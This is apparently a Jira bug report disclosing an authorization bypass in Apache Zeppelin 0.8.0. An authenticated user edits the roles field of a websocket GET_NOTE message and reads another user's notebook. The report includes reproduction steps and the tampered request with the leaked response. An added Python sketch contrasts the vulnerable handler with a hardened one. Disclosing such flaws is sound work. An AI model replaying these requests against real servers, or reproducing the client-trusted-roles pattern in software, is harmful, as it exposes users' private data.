
[security] Zeppelin Notebooks can be accessed by unauthorized Users


    Details

    • Type: Bug
    • Status: Open
    • Priority: Major
    • Resolution: Unresolved
    • Affects Version/s: 0.8.0
    • Fix Version/s: None
    • Component/s: zeppelin-server
    • Environment:

      Easily reproducible in 0.8 zeppelin version with Simple web socket client google extension

      Description

      Zeppelin Notebook role access can be easily bypassed and we can access other users' notebooks.

      The exploit is achieved using web sockets, as Zeppelin's web socket handling fails to validate whether the role of the active session of the user making the request is allowed to access another user's note/data. The Zeppelin web socket requests can be intercepted by a malicious authenticated user and the role value modified, enabling access to the other user's jobs/results.

      Reproduction Steps:
      The following is required to reproduce this finding:

      1) Authenticate to the Zeppelin service as user1, since a valid "ticket" value is required by the web socket request.
      (assume I logged in as akhil/akhil using Zeppelin's basic authentication method)

      2) Open the 'Simple Web Socket Client' Chrome extension (or use any interceptor tool like Burp).

      3) Open a random notebook. We can see the Zeppelin web client sending this request:

      {"op":"GET_NOTE","data":{"id":"2DWPTEZCW"},"principal":"admin","ticket":"de3a1427-6931-402d-9b31-2ca2797dcea5","roles":"[admin]"}

      4) Modify the above request: add a note ID which the admin role doesn't have access to, and edit the role to:

      {"op":"GET_NOTE","data":{"id":"2DZETETMP"},"principal":"admin","ticket":"de3a1427-6931-402d-9b31-2ca2797dcea5","roles":"[akhil]"}

      5) See the response from the web socket:

      {"op":"GET_NOTE","data":{"id":"2DZETETMP"},"principal":"admin","ticket":"de3a1427-6931-402d-9b31-2ca2797dcea5","roles":"[akhil]"}
      {"op":"NOTE","data":{"note":{"paragraphs":[{"text":"whoami","user":"akhil","dateUpdated":"2018-12-12T03:27:52+0000","config":{"colWidth":12.0,"enabled":true,"results":{},"editorSetting":{"editOnDblClick":false,"language":"sh"},"editorMode":"ace/mode/sh"},"settings":{"params":{},"forms":{}},"results":{"code":"SUCCESS","msg":[{"type":"TEXT","data":"zeppelin\n"}]},"apps":[],"jobName":"paragraph_1544585263373_-927336176","id":"20181212-032743_583387567","dateCreated":"2018-12-12T03:27:43+0000","dateStarted":"2018-12-12T03:27:52+0000","dateFinished":"2018-12-12T03:27:53+0000","status":"FINISHED","progressUpdateIntervalMs":500},{"user":"akhil","config":{},"settings":{"params":{},"forms":{}},"apps":[],"jobName":"paragraph_1544585272646_-198606435","id":"20181212-032752_1799562836","dateCreated":"2018-12-12T03:27:52+0000","status":"READY","progressUpdateIntervalMs":500}],"name":"Akhil Note","id":"2DZETETMP","angularObjects":{"2CHS8UYQQ:shared_process":[],"2CK8A9MEG:shared_process":[],"2CKAY1A8Y:shared_process":[],"2CKEKWY8Z:shared_process":[]},"config":{"isZeppelinNotebookCronEnable":false},"info":{}}},"ticket":"anonymous","principal":"anonymous","roles":""}

      We will get the whole details of the notebook even though the JSESSIONID and ticket are authenticated against admin, and admin doesn't have access to notebook 2DZETETMP.
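As an added illustration of the defensive fix (example code, not Zeppelin's own), the following Python sketch contrasts a GET_NOTE handler that believes the roles carried in the message with one that resolves principal and roles from the server-side session bound to the ticket. The session table, the note permission table and all function names are constructed for the example; only the message shapes come from the report above.

```python
import json

# Constructed server-side state for the example (not Zeppelin's real data
# structures): the login ticket is the only client value the server should trust.
SESSIONS_BY_TICKET = {
    "de3a1427-6931-402d-9b31-2ca2797dcea5": {"principal": "admin", "roles": {"admin"}},
}
# Constructed note permissions: which principals/roles may read each note id.
NOTE_READERS = {
    "2DWPTEZCW": {"admin"},   # admin's own note
    "2DZETETMP": {"akhil"},   # "Akhil Note" from the report; admin is not a reader
}

def parse_roles(field: str) -> set:
    """The report shows roles serialised as "[admin]" (no quotes), so split by hand."""
    return {r.strip() for r in field.strip("[]").split(",") if r.strip()}

def vulnerable_get_note(raw: str) -> bool:
    """Behaviour the report describes: the roles in the message are believed as-is."""
    msg = json.loads(raw)
    principals = {msg["principal"]} | parse_roles(msg["roles"])
    return bool(principals & NOTE_READERS.get(msg["data"]["id"], set()))

def hardened_get_note(raw: str) -> bool:
    """Resolve principal and roles from the ticket's server-side session only;
    the 'principal' and 'roles' fields sent by the client are never trusted."""
    msg = json.loads(raw)
    session = SESSIONS_BY_TICKET.get(msg.get("ticket"))
    if session is None or session["principal"] != msg.get("principal"):
        return False  # unknown ticket, or claimed principal does not match it
    principals = {session["principal"]} | session["roles"]
    return bool(principals & NOTE_READERS.get(msg["data"]["id"], set()))

# The tampered request from step 4 of the report.
TAMPERED = ('{"op":"GET_NOTE","data":{"id":"2DZETETMP"},"principal":"admin",'
            '"ticket":"de3a1427-6931-402d-9b31-2ca2797dcea5","roles":"[akhil]"}')

if __name__ == "__main__":
    print("vulnerable:", vulnerable_get_note(TAMPERED))  # True: note leaks
    print("hardened:  ", hardened_get_note(TAMPERED))    # False: denied
```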

        Attachments

        1. Zeppelin-role-issue.mov (29.34 MB, Akhil S Naik)
        2. Screen Shot 2018-12-13 at 9.58.21 AM.png (321 kB, Akhil S Naik)

        People

        • Assignee: Unassigned
        • Reporter: Akhil S Naik (akhilsnaik)